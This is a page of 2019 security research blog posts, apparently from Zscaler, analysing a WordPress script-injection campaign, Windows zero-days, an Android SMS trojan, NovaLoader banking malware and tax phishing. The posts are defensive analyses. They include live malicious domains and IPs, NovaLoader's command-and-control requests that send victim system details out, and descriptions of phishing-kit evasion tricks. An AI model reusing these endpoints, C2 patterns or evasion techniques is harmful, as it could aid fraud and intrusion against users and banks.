# Security Posts

### Top exploit kit activity roundup – Spring 2019

Zscaler Research - 10 min 49 sec ago
Categories: Security Posts

### Malicious JavaScript injected into WordPress sites using the latest plugin vulnerability

Zscaler Research - 10 min 49 sec ago
WordPress is by far the most popular content management system (CMS) and, because of its wide usage, it is also popular among cybercriminals. Most of the WordPress sites that have been compromised are the result of attackers exploiting vulnerable versions of the plugins used. A stored cross-site script vulnerability was discovered last week in the popular WordPress Live Chat Support plugin. The vulnerability allows an unauthenticated attacker to update the plugin settings by calling an unprotected "admin_init hook" and injecting malicious JavaScript code everywhere on the site where Live Chat Support appears. All versions of this plugin prior to version 8.0.27 are vulnerable. The patched version for this vulnerability was released on May 16, 2019,  and has been fixed for version 8.0.27 and higher. ThreatLabZ researchers recently discovered what may be the first campaign in which attackers are exploiting the Live Chat Support plugin vulnerability and injecting a malicious script that is responsible for malicious redirection, pushing unwanted pop-ups and fake subscriptions. While it is not yet seen as a widespread attack, the number of compromised websites is growing (at the end of this blog there is a link to the names of the compromised sites). Fig 1: Hits of the compromised WordPress sites Fig 2: WordPress site using a vulnerable version of the Live Chat Support plugin   Fig 3: Obfuscated script injected in the compromised WordPress site   Fig 4: Deobfuscated version of the injected script   The injected script sends a request to the URL hxxps://blackawardago[.]com to execute the main script. Fig 5: Request and response to the hxxps://blackawardago[.]com   After the execution of the above script, the victim is redirected to multiple URLs, mainly related to pushing unwanted popup ads and fake error messages. Fig 6: Highlighted (red) multiple redirected URLs after the execution of the malicious script.   Fig 7: Popups after execution of the malicious script   The domain that hosts the malicious script is a newly created domain hosted on a dedicated IP address. Fig 8: Whois information of the domain   Conclusion Cybercriminals actively look for new vulnerabilities in popular content management systems such as WordPress and Drupal, as well as popular the plugins that are found in many websites. An unpatched vulnerability in either the CMS or associated plugins provides an entry point for attackers to compromise the website by injecting malicious code and impacting the unsuspecting users visiting these sites. It is critical for website owners to apply the security update if they are using the vulnerable plugin, particularly because it is a pre-auth vulnerability and can lead to widespread compromise. The Zscaler ThreatLabZ team is actively tracking and reviewing all such malicious campaigns to ensure that our customers are protected.   IOCs blackawardago[.]com 216[.]10[.]243[.]93 List of compromised sites is available here.
Categories: Security Posts

### Microsoft vulnerability: Source code published for three zero-day vulnerabilities in Windows

Zscaler Research - 10 min 49 sec ago
Background A security researcher (with the pseudonym SandboxEscaper) has discovered three zero-day vulnerabilities in Microsoft Windows. Their POC and source code have been released on GitHub. Two of these are local privilege escalation (LPE) vulnerabilities. They have been tested to work on Windows 10 only. The third vulnerability is a sandbox bypass vulnerability in Internet Explorer 11 (IE11). As of this writing, no patch has been released by Microsoft for these vulnerabilities.   What is the issue? The security researcher has published three POCs: angrypolarbearbug2, bearlpe, and sandboxescape.  The first vulnerability – angrypolarbearbug2 – can be exploited by performing specially crafted DACL (discretionary access control list) operations when the Windows Error Reporting service tries to write a DACL for the given Windows Error Reporting (.wer) file. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker. The second vulnerability – bearlpe – targets the way the Windows task scheduler service uses the SetJobFileSecurityByName() function to write DACL for the job file. For this exploit to work, one needs to have "schtasks.exe" and "schedsvc.dll" files from Windows XP. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker. The third vulnerability – sandboxescape – bypasses the IE11 sandbox and allows an attacker to execute code in IE low protection mode. To exploit this vulnerability, an attacker needs to inject a special DLL in the IE process. According to reports, this exploit cannot be triggered remotely.   What systems are impacted? The POC has been tested on Windows 10 32-bit and 64-bit and IE11.   Zscaler coverage Advanced Threat Signatures: Win32.Exploit.Bearlpe  Win32. Exploit.CVE.2019.0863 Win32.Exploit.Polarbearescape W32/Agent.NBHI Zscaler Cloud Sandbox provides proactive coverage against exploit payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.
Categories: Security Posts

### IoT traffic in the enterprise is rising. So are the threats.

Zscaler Research - 10 min 49 sec ago
Do you know exactly what IoT devices are on your network and how active they are? You’d better, because they might be opening the door to cybercrime. IoT devices are, of course, nonstandard computing devices that connect wirelessly to a network and have the ability to transmit data. These devices can communicate and interact over the internet, and they can be remotely monitored and controlled. Connected devices are part of a scenario in which every device talks to other related devices in an environment to automate home and industrial tasks, and to communicate usable sensor data to users, businesses and other interested parties. IoT devices are meant to work in concert for people at home, in industry, or in the enterprise. Enterprises around the globe have been adopting the use of IoT products to improve organizational efficiency, enhance communications, and to gain insight into system performance. According to Gartner, 20.4 billion IoT devices will be in use worldwide by 2020, and more than 65 percent of enterprises will adopt IoT products. That translates to quite a bit of budget being dedicated to these devices. IDC has predicted that IoT spending will reach $745 billion in 2019 and surpass the$1 trillion mark in 2022. That’s a 15 percent increase over 2018’s $646 billion. According to the same report, the U.S. and China will be spending the most at$194 billion and $182 billion, respectively. They are followed by Japan, Germany, Korea, France, and the UK. Analyzing IoT transactions To help organizations get a better understanding of IoT activity in the enterprise, the ThreatLabZ research team analyzed IoT traffic across the Zscaler cloud during a one-month period between March and April 2019. The analysis looked at the types of devices in use, the protocols they used, the locations of the servers with which they communicated, and the frequency of their inbound and outbound communications, as well as IoT traffic patterns. The report, titled IoT in the Enterprise: an analysis of traffic and threats, provides a general overview of the most frequently seen device categories, then takes a deep dive into the transaction data for specific types of IoT devices. It also explores some of the security concerns around IoT devices, including the use of plain-text channels and the threat of malware. Emerging threats The rapid adoption of these IoT devices has opened up new attack vectors for cybercriminals. And, as is often the case, IoT technology has moved more quickly than the mechanisms available to safeguard these devices and their users. Researchers have already demonstrated remote hacks on pacemakers and cars. And, in October 2016, a large distributed denial-of-service (DDoS) attack, dubbed Mirai, affected DNS servers on the east coast of the United States, disrupting services worldwide. This attack was traced back to hackers infiltrating networks through IoT devices, including wireless routers and connected cameras. In August 2017, the U.S. Senate introduced the IoT Cybersecurity Improvement Act, a bill addressing security issues associated with IoT devices. While it is a start, the bill only requires internet-enabled devices purchased by the federal government to meet minimum requirements, not the industry as a whole. However, it is being viewed as a starting point that, if adopted across the board, could pave the way to better IoT security industry-wide. One of the ThreatLabZ team’s discoveries was that the vast majority of IoT transactions were occurring over plain text channels, instead of the more secure SSL-encrypted channels. While a major security vulnerability, the use of unsecured channels is just one vulnerability with IoT devices. They are notorious for weak, preset passwords that often go unchanged. Malware in IoT traffic As with just about every device connected to the internet, malware is also a threat to IoT devices. Each quarter, the Zscaler cloud blocks approximately 6,000 transactions from IoT-based malware and exploits. And, earlier this year, the Zscaler ThreatLabZ team analyzed certain threats that were targeting IoT devices. The fact is that there has been almost no security built into the IoT hardware devices that have flooded the market in recent years, and there’s typically no way to easily patch these devices. While many businesses have thought security for IoT devices unnecessary because nothing is stored on the devices, this isn’t the case. The Mirai botnet attack illustrated how exposed companies can be as a result of their IoT devices. Even though these devices continue to be an easy target for cyberattacks, enterprises can take steps to reduce the risk: Change default credentials to something more secure. As employees bring in devices, encourage them to be sure their passwords are strong and their firmware is always up to date. Install IoT devices on isolated networks (to prevent lateral movement), with restrictions on inbound and outbound network traffic. Restrict access to the IoT device as much as possible from external networks. Block unnecessary ports from external access. Apply regular security and firmware updates to IoT devices, in addition to securing the network traffic. Finally, deploy a solution to gain visibility of the shadow IoT devices that are already sitting inside the network and ensure above safeguards. Advanced security for IoT devices IoT devices have become commonplace in enterprises from all industries and in nearly every corner of the globe. These devices were designed to help improve efficiency and expand communications, and organizations continue to explore new ways to incorporate these devices into everyday operations. Of course, many of the devices are employee-owned, and this is just one of the reasons they are a security concern. With all of these new connected devices, and the enormous amounts of associated data traversing your network and opening up new attack vectors for cybercriminals, can you trust your legacy network to provide adequate security? The security of your enterprise hinges on your answer. Read the entire report, IoT in the Enterprise: an analysis of traffic and threats. I’d like to thank our Sr. Security Researcher Viral Gandhi for his help in compiling the report. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Deepen Desai is VP of Security Research at Zscaler Categories: Security Posts ### Critical Update: Windows Remote Desktop Services Vulnerability Zscaler Research - 10 min 49 sec ago Background Earlier today Microsoft released several security updates as part of its regular monthly updates known as Patch Tuesday. One of the issues that was patched in today's update, CVE-2019-0708, is critical, and all Windows users should apply the patches immediately, regardless of whether or not they are running the vulnerable operating system. Large organizations following 15/30/60-day patch cycles should consider making an exception and applying the patches as soon as possible, especially if running one of the vulnerable operating systems. What is the issue? CVE-2019-0708 is a remote code execution vulnerability in Microsoft Windows Remote Desktop Services that affects several older versions of the Windows operating system. What makes this vulnerability unique, and alarming, is that an attacker attempting to exploit the vulnerability does not have to be authenticated to the target machine and needs no interaction from the target user for the machine to be compromised. In other words, this can and most likely will be exploited by malware authors to spread payloads rapidly, from unpatched system to unpatched system. There have been no exploitations detected yet, but this is the type of vulnerability that could lead to another attack like WannaCry, which caused massive disruptions in organizations around the world in May 2017. What systems are impacted? Windows XP, Windows 2003, Windows 7, Windows Server 2008 R2, and Windows Server 2008 operating systems are vulnerable. Windows 8 and Windows 10 operating systems are NOT vulnerable. What can you do to protect yourself? Microsoft has been proactive in releasing security updates for the unsupported operating systems, given the critical nature of this vulnerability. Apply the security updates released by Microsoft immediately from the following locations: For supported operating systems: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EGB For unsupported end-of-life operating systems [Windows XP and 2003]: https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708 Zscaler coverage Zscaler Cloud Sandbox provides proactive coverage against worm payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage. Categories: Security Posts ### Working together to understand the threat landscape Zscaler Research - 10 min 49 sec ago As a society, we are more connected than ever before. Our community is no longer just the people living nearby. It is now a global community, made up of disparate individuals connected not by proximity but by the internet. As in almost any community, crime is a factor. In today’s digital society, that means cybercriminals, and they seem to be launching new attacks every day. These cybercriminals have gone from lone hackers to sophisticated criminal organizations, launching attacks on individuals, corporations, and governments. As these criminals have become more organized, the challenge in fighting them has become more difficult. If the cybercriminals are working together to increase their chances of success, it makes sense that those who fight these bad actors should also work together. Today, Verizon released its 2019 Data Breach Investigations Report, and I am proud that the Zscaler ThreatLabZ team once again actively contributed to the findings in this report. The Verizon 2019 Data Breach Investigations Report takes an in-depth look at security incidents and data breaches that occurred in 2018. The report analyzes 41,686 security incidents, of which 2,013 were confirmed data breaches. It looks at how the results have or have not changed over the years and digs into the overall threat landscape and the actors, actions, and assets that are present in breaches. The report delves into security incident patterns and describes how they correlate to the various industry verticals. In addition to these primary patterns, the report includes a subset of data to pull out financially motivated social engineering (FMSE) attacks, which are more focused on credential theft and duping people into transferring money into adversary-controlled accounts. Among the findings, the report revealed that 43 percent of data breaches occurred at small businesses, which tend to have less stringent security than larger organizations, making them an easier target. The most common tactic used in breaches was hacking (52 percent of the time), while errors (21 percent) and misuse by authorized users (15 percent) also led to breaches. And, as can be expected, financial gain was the most common motivation (71 percent). These results, and the others detailed in the report, are based on data collected from a variety of sources, including publicly disclosed security incidents, cases provided by the Verizon Threat Research Advisory Center (VTRAC) investigators, and external collaborators, such as ThreatLabZ. The year-to-year data includes new sources of incident and breach data as more organizations share information to improve the diversity and coverage of real-world events. The number of organizations providing data continues to grow, with 66 organizations external to Verizon now contributing to this report. This community of data contributors represents an international group of public and private entities that understand the importance of sharing information to gain a better understanding of the threats we all face on a daily basis. This is the second consecutive year that Zscaler has provided transaction data for the report. The ThreatLabZ team examined transactions processed in the Zscaler cloud during 2018, specifically looking for attempted phishing attacks and blocked malware. We also offered insights into each threat category with supporting telemetry information indicating the number of users affected by these security incidents and data breaches. It is heartening to see so many organizations coming together to share information in an ongoing effort to secure the internet and this digital world in which we all participate. Unfortunately, cybercriminals will continue developing new threats and attack methods, as long as there’s a potential payoff. And, since there is no sign of attackers stopping any time soon, it is up to all of us working in the cloud and cybersecurity industries to work together to make their job a lot more difficult. I think Gloria Macapagal Arroyo, the 14th President of the Philippines, said it very well: “The power of one, if fearless and focused, is formidable, but the power of many working together is better.” Download the entire Verizon 2019 Data Breach Investigations Report. Read more from the ThreatLabZ team. Read about Zscaler cloud security here. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Deepen Desai is vice president of security research at Zscaler Categories: Security Posts ### From third-party Android store to SMS Trojan Zscaler Research - 10 min 49 sec ago In lieu of downloading and installing apps from the official Android app store, users often turn to third-party stores. The reasons vary, from wanting a particular app that isn’t available on the official store to seeking cracked apps—versions that have been modified to disable certain features, such as copyright protections—of official Android apps. Recently, the ThreatLabZ research team came across one of these third-party app stores that seemed to be hosting Android games. The store, called “Smart Content Store,” portrays itself as an Android app store and uses names such as sexy.smartcontentstore[.]com and games.smartcontentstore[.]com. Fig 1: Third-party app store homepage At first glance, the site appears to be an app store hosting Android games, but we were unable to download any apps. Clicking the Install option on any of the games, as seen in screenshot above, leads back to the same page. Upon further examination, we found many direct links to APKs being downloaded from these domains. The image below shows the direct downloads of these APKs. Fig 2: Zscaler dashboard These apps have different package names and certificates, but every app exhibits the same functionality. We have provided an analysis of one of the apps below. (A complete list of apps can be found in the IOC at the end of blog.) App summary APK Name: smartworld_-_WIN_-_500929091890143_-_.apk Package name: vaya.bailecito.epore.saturda Size: 2100203 bytes MD5: 091E91A9ED7202CD44DC5E1C4B3DCC90 Technical details As soon as the app is installed, it appears as a blank space. As shown in the screenshot below, the app icon and app name are missing. Upon clicking the space (the invisible icon) the app displays its first activity with two options: Smart World and Sexy World. Fig 3: Invisible app icon and the first activity During the initial phase, the app sends several requests to hxxp://play4funclub[.]com/public/notification/is-active, but during our analysis, we just received 301-Moved Permanently in response. These requests can be seen in the screenshot below. Fig 4: Initial requests Upon clicking either of the two options shown above, Smart World or Sexy World, the app asks for Administrator privileges, stating "To view all the porn videos you need to update. Click to activate.” This message can be seen in the screenshot below (left image). Fig 5: Admin privileges As soon as the victim activates admin rights, a request is sent to another domain. Nothing happened as a result of this request, so we believe that it is simply an indication to the attacker whether the victim has activated admin rights or not. Fig 6: Request upon enabling admin rights After a certain amount of time passes, the app starts sending requests to hxxp://app.in-spicy[.]com/scripts/app_sms_request_get_number.php with details about the victim's device and location. It sends the following information in its POST request: Android version Installation date Version Date (Date of request) Country code Carrier Device ID The screenshot below shows the request and response taking place between the compromised device and attacker: Fig 7: Request and response related to the SMS message The app acts according to the response received from the attacker’s domain. If the response contains "status":"OK", the app fetches the desired details from the response. In our case, it was a phone number and message body. Further, it sends an SMS message to that specific number and message body. This functionality is visible in the screenshot below where the response from the attacker is contained in paramJSONObject and is based on the response, sendTextMessage; this response initiates a routine that sends actual SMS messages. Fig 8: Sending SMS functionality During this phase of analysis, we observed several attempts to send SMS messages to different phone numbers with different text as the message body. This can result in high costs to the victim. Some examples of the SMS messages can be seen in the table below: Phone # Message Body 6768482371 message:france athletes employed 6857215675 message:experience iran yarn combines field 6768482371 message:luther exercise queens 2347003300131 message:hungary contributing task bird 6857215675 message:boolean wisconsin criticism verification republic 2347003300131 message:exchange audience nc medicaid 2347003300131 message:ut controlled salt customized consider 6768482371 message:legislative wayne brand hungarian 6768482371 message:consulting gui contrary eclipse 79697530171 message:boards tits difficulties 6768482371 message:royalty relay mv 6768482371 message:boards sie gabriel computer 6768482371 message:mods html chronic 6768482371 message:integer coleman monsters 6745596671 message:capabilities labels addiction 6768482371 message:checking upskirt football possibilities 6745596671 message:academics actively matrix ga 2347003300131 message:incidence quality mrs estimated default 6745590060 message:estate mexican legal flour 6768482371 message:cleared connectivity divx 2347003300131 message:cafe activists our constantly 6745596671 message:brush accepted role 6745596671 message:plain weed senators reform framing 6745596671 message:represents fig answers signup 6745596671 message:animation failure lucas browser poetry 2347003300131 message:biodiversity present solving herbal regulations 6857215675 message:shakira wanna movie freight 6768482371 message:shipping uzbekistan senators optimize basically 6857215675 message:folks tamil cooper 6857215675 message:picking maine shapes men wives This app also has permission to view the victim’s contact list, which means the app can easily spread itself using those contacts. We also found other high-level permissions and we are analyzing the sample further to determine their functions and potential impact. We will update this report with any interesting findings. Conclusion The Zscaler Cloud Sandbox successfully flagged the sample as malicious based on indicators found in the sample, as shown in the report screenshot below. Fig 9: Zscaler Cloud Sandbox Zscaler advises Android users to download apps only from official app stores. Using third-party stores may lead to the installation of apps that have hidden, malicious intentions, as described in this case. We also advise users to keep the Unknown Sources option off at all times on your Android device. Keep this off will prevent any third-party app to directly get installed on the device. IOCs Domains app.in-spicy(dot)com insidecontentsp(dot)com incontsmart(dot)com MD5 044b97016fdcd22c8c2211014e65c562 bb5a4cea098a29ac8533c561784908b4 58f237f346d81385eaa2005cd642e28c f50091fbe2fef0c9501f242afb356c96 2cbf13b90b76300f9668c2660b9cbc35 5c68ff95c2278da0fcc13b4c46f7978b 091e91a9ed7202cd44dc5e1c4b3dcc90 88c2ccec249ff6df0fd525e09e700861 8ac5e78f4bc7212fcadd805c924ba67c eaa2f149f33e35906095857064721044 60772ad9808a5bab595f3459e8d5bb4c 9f4ff0d5425f1542fe4aef50cb1b20dd 64d5bba5e3a18f971ee5904ccc9b7826 20614d2d2471b2a7fcfbbf67f0fdbfb6 6f31a49153b6b504ce8804c91113852f d717c2c4ebce47d40aea491e911b1c5d 3124ae1a165d2fd1f5ab4e6b83a1100a 4f3289108728c33866e62e99a1fed40d 1a027810c28fad34c7590ddb18dc6a51 4fd81f83d8cb40f6fb0bd1ad94b8ea7f 32131606ac4448683dad9148e4754f81 afe96ae477648b152e7434ac5c0790c6 793fc48a4947a3c19efc570ba8af1235 62ff00af19ad0ed02ab65f3d8a6ceb27 61d9506df0a016435297829bb386e4b8 61ded4d4c3268c354a794dc4c6dea530 81685083658d7e839e68489391f15a05 2bcc9865edb66883b82f43c34e6ac19d a8a75b3055a9aa27a26d326061173287 8dbbcdfa3d4d1207e325890680f98d4a 58271be93858eb5baeaa401fe1d583bb a350e8b88d586e26e9dc858c83407ebc a5219ee0c3c10ca8db991d05fe34b9b0 ca17d9260a247e6457876a2f98e3fab7 064a46635c0bda86bcc42ae484ee5c25 874e3af735b6e17ddd596c29e2fc55d5 cfe0d20dbf674f8619584c850eda2186 0cadfdf04df0f3dba0e8a0fdb087993b dada3ef23b89c9e0f535aa7dd49360e1 b34d3dbd6241f63670e010f7da05630b 43a70f5f1929e882894a023a67ffe23f 00b9c19f229892ad6f0c45f75a5bf729 154ee512e7142f56118209ec9375433d 4cd7745e9f0043ed3da046f88249b221 1efefb04a779b5cd7ccfc1aa4b104fc1 22b5cec87a9227abbaa6f120f4809230 0648e6c78d85ce62eed06fbb94283712 Categories: Security Posts ### NovaLoader, yet another Brazilian banking malware family Zscaler Research - 10 min 49 sec ago As part of our daily threat tracking activity, ThreatLabZ researchers recently came across an interesting Brazilian banking malware campaign. The malware, NovaLoader, was written in Delphi and made extensive use of Visual Basic Script (VBS) scripting language. Although the final payload was not entirely new and has been discussed by other security researchers, we found that the multi-stage payload delivery was unique. Delivery method In earlier documented campaigns, the delivery methods for this malware included spam, social engineering, and fake sites for popular software such as Java. The malware operators use a variety of available options to ensure malware delivery and try to avoid detection by security products. They often do so by abusing popular legitimate services like Dropbox, GitHub, Pastebin, AWS, GitLab, and others, as well as URL shorteners and dynamic DNS services such as No-IP and DynDNS. NovaLoader is known to use AutoIt, PowerShell, and batch scripts in the infection chain, but this is the first time we have seen it use VBS. In this campaign, it is also using encrypted scripts instead of simply obfuscated ones. Fig.1: NovaLoader Infection flow Main Dropper MD5: 4ef89349a52f9fcf9a139736e236217e The main dropper is very simple; its only purpose is to decrypt the embedded VB script and run the decrypted script. Fig. 2: Stage 1 VB script decryption loop Stage 1 Script Embedded script before and after decryption: Fig. 3: VB script before and after decryption This VBS file will decrypt a URL (dwosgraumellsa[.]club/cabaco2.txt) to download another encrypted script and run that after decryption. D Fig. 4: Download request for the next stage, an encrypted payload Stage 2 Script Downloaded VB script looks like the following after decryption: Fig. 5: VBS after decryption The VB script will send a GET request to “http://54.95.36[.]242/contaw.php” , possibly to let the command-and-control (C&C) server know that it is running on the system. After that it will try to detect presence of virtual environment using Windows Management Instrumentation (WMI) queries, as shown below. Fig. 6: VM detection code NovaLoader will drop and copy following executable files into the directory C:\\Users\\Public\\: C:\\Windows\\(system32|SysWOW64)\\rundll32.exeC:\\Windows\\(system32|SysWOW64)\\Magnification.dll Fig. 7: C&C notification request After that it will download a following files from 32atendimentodwosgraumell[.]club 32atendimentodwosgraumell[.]club/mi5a.php decrypted and saved at C:\Users\Public\{random}4.zip32atendimentodwosgraumell[.]club/mi5a1.zip saved at C:\Users\Public\{random}1.zip32atendimentodwosgraumell[.]club/mi5asq.zip saved at C:\Users\Public\{random}sq.zip Then it will send multiple GET requests to “54.95.36.242/contaw{1-7}[.]php” Fig. 8: Multiple C&C requests GET /contaw.php GET /contaw2.php?w={redacted}BIT-PC_Microsoft%20Windows%207%20Professional%20_True GET /contaw3.php?w={redacted}BIT-PC GET /contaw4.php?w={redacted}BIT-PC GET /contaw5.php?w={redacted}BIT-PC GET /contaw6.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM GET /contaw7.php?w={redacted}BIT-PC_2/1/2019%205:05:06%20PM_CD=414KbCD1=9160Kb_ It will also drop several files into the C:\Users\Public\ directory: Dropped files MD5 Comment DST.exe 51138BEEA3E2C21EC44D0932C71762A8 copied rundll32.exe I 3DC26D510907EAAC8FDC853D5F378A83 encypted file containing various values like version, extension etc. I_ A34F1D7ED718934185EC96984E232784 encrypted configuration file KC 89473D02FEB24CE5BDE8F7A559631351 similar to file named "I" mwg.dll F3F571288CDE445881102E385BF3471F copied magnification.dll PFPQUN.DST 8C03B522ACB4DDC7F07AB391E79F1601 support dll to decrypt main payload PFPQUN1.DST F3D4520313D05C66CEBA8BDA748C0EA9 encrypted main payload winx86.dll 87F9E5A6318AC1EC5EE05AA94A919D7A Sqlite dll Fig. 9: Files dropped by script And, finally, it will execute the decrypted DLL exported function using the copied rundll32.exe file. Fig. 10: Executing the stage-3 payload The stage-3 payload is a DLL file that acts as a loader for the final payload. It is run via rundll32.exe and its purpose is to decrypt and load the final payload. Final payload The final payload is written in Delphi. It has multiple capabilities including stealing victim's credentials for several Brazilian banks. It monitors the browser window’s title for bank names and if a targeted tab is found, the malware can take control of the system and block the victim from the real bank's page to do its nefarious activities by communicating to its C&C. Its activity is quite similar to the well-known Overlay RAT. Some of the interesting commands used by the malware include: Command String Description To stabilize socket connection Sends infected OS details Checking status of the connection Close all connections Sends keystrokes to the active application window Set mouse position Set mouse left button down Set mouse left button up Set mouse right button up Set mouse right button down Share compromised system desktop Check gets in C&C response to check if data is correct reply with Fig. 11: NovaLoader C&C commands There were many interesting strings related to the Brazilian banks found in malware: Strings in malware Corresponding bank site caixa http://www.caixa.gov.br bancodobrasil https://www.bancobrasil.com.br bbcombr https://www.bb.com.br/ bradesco https://banco.bradesco/ santander https://www.santander.com.br/ bancodaamazonia https://www.bancoamazonia.com.br/ brbbanknet https://brbbanknet.brb.com.br/netbanking/ banese https://www.banese.com.br/ banestes https://www.banestes.com.br/ bancodoestadodopar https://www.banpara.b.br/ bancobs2 https://www.bs2.com/ citibankbrasil https://www.citibank.com.br bancofibraonline https://www.bancofibra.com.br/ agibank https://www.agibank.com.br/ bancoguanabara http://www.bancoguanabara.com.br/ ccbbrasil http://www.br.ccb.com bancoindusval https://www.bip.b.br/ir internetbankingbancointer https://internetbanking.bancointer.com.br/ modalbanking https://modalbanking.modal.com.br/ bancopan https://www.bancopan.com.br/ pineonline https://www.pine.com/ Fig. 12: Some of the targeted bank strings found in the malware Conclusion The Brazilian actors are among the top contributors of global cybercrime and they are always coming up with new ways to infect their targets using spam, social engineering, and phishing. In this campaign, we have observed them targeting Brazilian financial institutions using malware written in Delphi. The Zscaler ThreatLabZ team is actively tracking and reviewing all malicious payloads to ensure that our customers are protected. IOCs Md5 60e5f9fe1b778b4dc928f9d4067b470b 4ef89349a52f9fcf9a139736e236217e 100ff8b5eeed3fba85a1f64db319ff40 99471d4f03fb5ac5a409a79100cd9349 cb2ef5d8a227442d0156de82de526b30 a16273279d6fe8fa12f37c57345d42f7 ac4152492e9a2c4ed1ff359ee7e990d1 fdace867e070df4bf3bdb1ed0dbdb51c 4d5d1dfb84ef69f7c47c68e730ec1fb7 6bf65db5511b06749711235566a6b438 c5a573d622750973d90af054a09ab8dd ef5f2fd7b0262a5aecc32e879890fb40 35803b81efc043691094534662e1351c 34340c9045d665b800fcdb8c265eebec a71e09796fb9f8527afdfdd29c727787 5a9f779b9cb2b091c9c1eff32b1f9754 a7117788259030538601e8020035867e cb9f95cec3debc96ddc1773f6c681d8c a7722ea1ca64fcd7b7ae2d7c86f13013 URLs 185[.]141[.]195[.]5/prt1.txt 185[.]141[.]195[.]81/prt3.txt 185[.]141[.]195[.]74/prt1.txt dwosgraumellsa[.]club/cabaco2.txt wn5zweb[.]online/works1.txt 23[.]94[.]243[.]101/vdb1.txt 167[.]114[.]31[.]95/gdo1.txt 167[.]114[.]31[.]93/gdo1.txt Categories: Security Posts ### 2019 tax season phishing scams Zscaler Research - 10 min 49 sec ago Tax time is here again and that means two things: writing big checks to Uncle Sam and, of course, a new season of tax scams brought to you by industrious and persistent malware authors. Americans feeling the rising panic of ensuring that they are squared up with the federal government before April 15 are searching for help online and downloading the financial statements they need for filing. The bad actors are counting on it and, as you read this, there's a high probability that somewhere in your inbox is a link to a scam attempting to collect sensitive information from you. The IRS has been warning people about some of the tax scams this season using its annual “Dirty Dozen” compilation of phishing and online scams. Of the following scenarios, which do you think is more likely? Will you be phished by a dodgy-looking IRS website, or will you get phished by a bogus financial website? Here at Zscaler, the ThreatLabZ research team has been monitoring such traffic and we've seen an increase in attempted generic phishing attacks posing as financial institutions. This trend makes sense because tax preparation usually means getting tax documents from several different financial institutions—your bank, your mortgage holder, your retirement and investment accounts, and so on. The following figure depicts financial and tax refund phishing events observed in the Zscaler cloud over the past two months. Figure 1: Financial (gold) and tax refund (green) phishing events over the past two months "IRS Login" phishing Though the majority of phishing sites were for "generic" financial institutions, we did see IRS phishing websites, including the following, which asks the user to enter an email address and then redirects to verify the account and fill in additional information including Social Security Number. Figure 2: IRS Phishing – Login page Figure 3: IRS Phishing – Personal and SSN details Fake “Apply for EIN” scam and Google SEO poisoning An EIN (Employer Identification Number) is a Federal Tax ID number required by businesses or other entities to file taxes. Required persons/entities can apply for an EIN on the IRS website and can get it immediately at no cost. Scammers have been active out there, attempting to phish unsuspecting users of their information and money by advertising themselves as experts in filing for Tax IDs. A Google search of “irs tax id” resulted in multiple scamming websites among the top ads. Figure 4: Google search results for IRS Tax ID showing ads for scamming websites We noticed a few of these sites, such as irs-tax-id[.]com, gov-irs-ein[.]co, and irs-ein-tax[.]com, using the same phishing template for their homepage, which you can see in the image below. ​ Figure 5: “Apply for EIN” phishing template used by multiple sites Figure 6: Phishing page requesting personal information including SSN Figure 7: Phishing page requesting credit card information Here are a few of the domains that are active in luring users to apply for an Employer Identification Number (EIN). Figure 8: “Apply for EIN” phishing domains Tax refund phishing campaign – UK Tax year in the UK has just ended (April 6) and scammers have been preparing to take advantage of users seeking their refunds. One of the phishing domains we have been monitoring, hmrc[.]co[.]uk[.]pendingrefund[.]tk, updated its phishing pages on April 6 to keep up with tax season events. It began with a refund claim form and was changed to a form for "processing" the claim and applying it to the user's credit card. Phishing campaign observed before April 6: Page 1: start.php requesting name and address Page 2: claim_details.php displaying the information entered in start.php and fake amount Page 3: details.php requesting detailed personal information and credit card details Figure 9: Phishing pages observed before April 6, 2019 And the current page (Tax-Refund.php) served by the phishing website (starting April 6) can be seen in the below image: Figure 10: Phishing page observed on April 6, 2019 Malware campaign The IRS has warned about a “Tax Transcript” email scam used by attackers to distribute malicious documents containing malware. ThreatLabZ has also noticed tax-themed malicious documents delivering Emotet and Nymiam malware, which are well-known Trojans used for stealing data and credentials, among other malicious functions. The following is the report of a recent Nymiam malware sample observed in the Zscaler Cloud Sandbox and delivered through a malicious URL: djaccounting[.]tax/wp-admin/98-14691361298-580222944834109973.zip Figure 11: Cloud Sandbox Report for Nymiam malware sample: 7B80A64E9A106806EE4F62A16A968661 Conclusion Every year during tax season, our researchers identify various kinds of phishing campaigns performing tax-related social engineering tactics in an attempt to collect sensitive information from unsuspecting users. You can read about some of the phishing campaigns that we observed during last year’s tax season here. The IRS has also been alerting tax filers about active tax scams and providing guidelines for safely filing taxes. At ThreatLabZ, we have been actively monitoring the latest tax scam campaigns and providing protection for Zscaler customers. Categories: Security Posts ### The evolution of phishing kits Zscaler Research - 10 min 49 sec ago Gone are the days when a phishing page was a single page designed to capture user credentials. Phishing kits have become sophisticated and advanced to evade detection and look more legitimate to the user. In this blog, we will discuss some of the latest evasive and anti-analysis techniques used by these phishing kits. Techniques to make phishing pages look more legitimate 1. Verification of payment card number before accepting Many phishing campaigns related to banking, online shopping, or account upgrades ask victims to provide payment details to complete their online transactions. In such cases, most of the phishing campaigns simply check the length of the card number (debit or credit) provided by the victim and restrict them to 16 digits to prevent random details from being entered. In some cases, attackers go one step further, using online verification services to ensure that the victim enters the correct payment information. The information about the institution that issued a particular card can be checked with the initial six or eight digits of the card number, which is called an Issuer Identification Number (IIN). Many online services provide APIs to check the IIN of a card. The screenshot below shows one such case. Fig. 1: Request to check IIN information of the payment card number shown in the source code 2. Changing the language of phishing content based on victim’s geo-location Most phishing campaigns are designed in one language based on the probable victims of the attack. Such phishing pages only work in a particular region or country according to the language it is designed in. Like legitimate websites that are often "localized," there are a few phishing campaigns that instead of using one language deliver phishing content based on the geographical location of the victim, determined after the victim’s IP is checked. Below is one such campaign which first checks the victim’s geo-location; all the main strings in the phishing page are variable with values that depend on geo-location. Fig. 2: The main heading variable on the phishing page Fig. 3: Values of the phishing page title, heading, and submit button based on 